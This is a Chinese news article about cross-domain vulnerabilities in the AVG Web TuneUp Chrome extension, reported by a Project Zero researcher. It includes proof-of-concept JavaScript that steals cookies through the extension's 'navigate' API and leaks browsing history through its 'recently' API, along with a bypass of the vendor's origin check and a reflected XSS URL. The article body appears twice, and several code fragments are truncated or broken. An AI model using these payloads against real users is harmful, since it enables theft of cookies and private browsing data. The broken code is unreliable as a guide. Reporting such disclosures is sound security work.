下载安卓APP箭头
箭头给我发消息

客服QQ:3315713922

谷歌浏览器插件AVG Web TuneUp被曝数个高危漏洞,逾900万用户安装

作者:课课家教育     来源: http://www.kokojia.com点击数:1342发布时间: 2015-12-31 13:55:54

标签: 谷歌

  今年8月15日, 来自project zero的成员Tavis提交了谷歌浏览器插件 AVG web TuneUp的多个漏洞,由于该插件活跃用户约900万,所以影响范围非常广。

谷歌浏览器插件AVG Web TuneUp被曝数个高危漏洞,逾900万用户安装_谷歌_课课家

  这个插件添加了很多的api用来操作谷歌浏览器,比如可以轻易的劫持搜索框和新标签页。而由于其安装过程十分复杂,所以能够逃避谷歌恶意软件的检查,特别是能够逃避谷歌浏览器“阻止滥用扩展的API”的检查。

  事实上其中的很多api是有问题的,攻击者可以通过构造payload成功盗取用户在avg.com上的cookie,还可以获取用户的浏览记录以及其他的私人数据,甚至有可能成功实施任意命令执行。

  攻击手法

  Tavis在给厂商的邮件中列举了几种攻击手法:"navigate" API 将会导致一个通用的跨域xss漏洞,attacker.com可以跨域读取访问者的mail.google.com的邮件或者是来自于其他网站的数据。

  for (i = 0; i

  以上代码为Tavis给的poc

  通过 window.postMessage(允许跨域通信的javascript api) 不间断的向 AVG: "Web TuneUP”插件发起请求,请求的数据为:

  { origin: "web", action: "navigate", data: {url:"Javascript:document.location.hostname.endsWith('.avg.com')"+ "?"+ "alert(document.domain + ':' +document.cookie)"+ ":"+ "false",tabID: i}}

  当用户的标签页在访问avg.com网站时,将爆破以.avg.com结尾的网站的当前域名和cookie值。"recently" api将会泄露当前用户的浏览记录

  window.addEventListener("message", receiveMessage, false);

  window.postMessage({ from: "web", to: "content", method: "recently" }, "*")

  function receiveMessage(event)

  {

  if (event.data != undefined && event.data.historyItems != undefined) {

  var obj = JSON.parse(event.data.historyItems);

  document.write("Here is a list of websites you've been visiting");

  document.write("

  ");

  for (i in obj) {

  var d = new Date(obj[i]);

  document.write("" + i + " on " + d);

  document.write("

  ");

  }

  }

  }

  以上代码为Tavis给的poc

  通过window.postMessage向插件的"recently"API发起请求获取当前用户的浏览记录,本地监听事件来获取返回的数据,然后输出数据。

  随后厂商对此进行了修复,但是由于修复的不对,又被Tavis绕过了。修复的代码中增加了判断

  var match = event.origin.match(/https?:\\/\\/.*\\.avg\\.com/i);

  if (match ! null {

  ...

  }

  判断来源是不是包含".avg.com",但是这个很容易被绕过。比如https://www.avg.com.www.attacker.com这个域名就能绕过这个限定,继续实施上面提到的两个攻击。又会因为上面的对协议的判断是既支持http又支持https,于是又产生了“中间人攻击”这个问题。

  厂商对此又进行了修复,这次限制了域名必须为"mysearch.avg.com"和"webtuneup.avg.com" 。但通过下面这个xss,他又可以对用户数据进行窃取:

  http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html?risk=%3Cimg%20src=x%20onerror=alert(1)%3E&searchParams=%7B%22lang%22%3A%22en%22%2C%22pid%22%3A%22pid%22%2C%22v%22%3A%22vv%22%7D

  这个问题在4.2.5.169版本的AVG Web TuneUp中得到了修复,可以通过在商店中进行升级。

  今年8月15日, 来自project zero的成员Tavis提交了谷歌浏览器插件 AVG Web TuneUp的多个漏洞,由于该插件活跃用户约900万,所以影响范围非常广。

  这个插件添加了很多的api用来操作谷歌浏览器,比如可以轻易的劫持搜索框和新标签页。而由于其安装过程十分复杂,所以能够逃避谷歌恶意软件的检查,特别是能够逃避谷歌浏览器“阻止滥用扩展的API”的检查。

  事实上其中的很多api是有问题的,攻击者可以通过构造payload成功盗取用户在avg.com上的cookie,还可以获取用户的浏览记录以及其他的私人数据,甚至有可能成功实施任意命令执行。

  攻击手法

  Tavis在给厂商的邮件中列举了几种攻击手法:"navigate" API 将会导致一个通用的跨域xss漏洞,attacker.com可以跨域读取访问者的mail.google.com的邮件或者是来自于其他网站的数据。

  for (i = 0; i

  以上代码为Tavis给的poc

  通过 window.postMessage(允许跨域通信的javascript api) 不间断的向 AVG: "Web TuneUP”插件发起请求,请求的数据为:

  { origin: "web", action: "navigate", data: {url:"javascript:document.location.hostname.endsWith('.avg.com')"+ "?"+ "alert(document.domain + ':' +document.cookie)"+ ":"+ "false",tabID: i}}

  当用户的标签页在访问avg.com网站时,将爆破以.avg.com结尾的网站的当前域名和cookie值。"recently" api将会泄露当前用户的浏览记录

  window.addEventListener("message", receiveMessage, false);

  window.postMessage({ from: "web", to: "content", method: "recently" }, "*")

  function receiveMessage(event)

  {

  if (event.data != undefined && event.data.historyItems != undefined) {

  var obj = JSON.parse(event.data.historyItems);

  document.write("Here is a list of websites you've been visiting");

  document.write("

  ");

  for (i in obj) {

  var d = new Date(obj[i]);

  document.write("" + i + " on " + d);

  document.write("

  ");

  }

  }

  }

  以上代码为Tavis给的poc

  通过window.postMessage向插件的"recently"API发起请求获取当前用户的浏览记录,本地监听事件来获取返回的数据,然后输出数据。

  随后厂商对此进行了修复,但是由于修复的不对,又被Tavis绕过了。修复的代码中增加了判断

  var match = event.origin.match(/https?:\\/\\/.*\\.avg\\.com/i);

  if (match ! null {

  ...

  }

  判断来源是不是包含".avg.com",但是这个很容易被绕过。比如https://www.avg.com.www.attacker.com这个域名就能绕过这个限定,继续实施上面提到的两个攻击。又会因为上面的对协议的判断是既支持http又支持https,于是又产生了“中间人攻击”这个问题。

  厂商对此又进行了修复,这次限制了域名必须为"mysearch.avg.com"和"webtuneup.avg.com" 。但通过下面这个xss,他又可以对用户数据进行窃取:

  http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html?risk=%3Cimg%20src=x%20onerror=alert(1)%3E&searchParams=%7B%22lang%22%3A%22en%22%2C%22pid%22%3A%22pid%22%2C%22v%22%3A%22vv%22%7D

  这个问题在4.2.5.169版本的AVG Web TuneUp中得到了修复,可以通过在商店中进行升级。

赞(17)
踩(1)
分享到:
下一篇:Swift模式匹配
华为认证网络工程师 HCIE直播课视频教程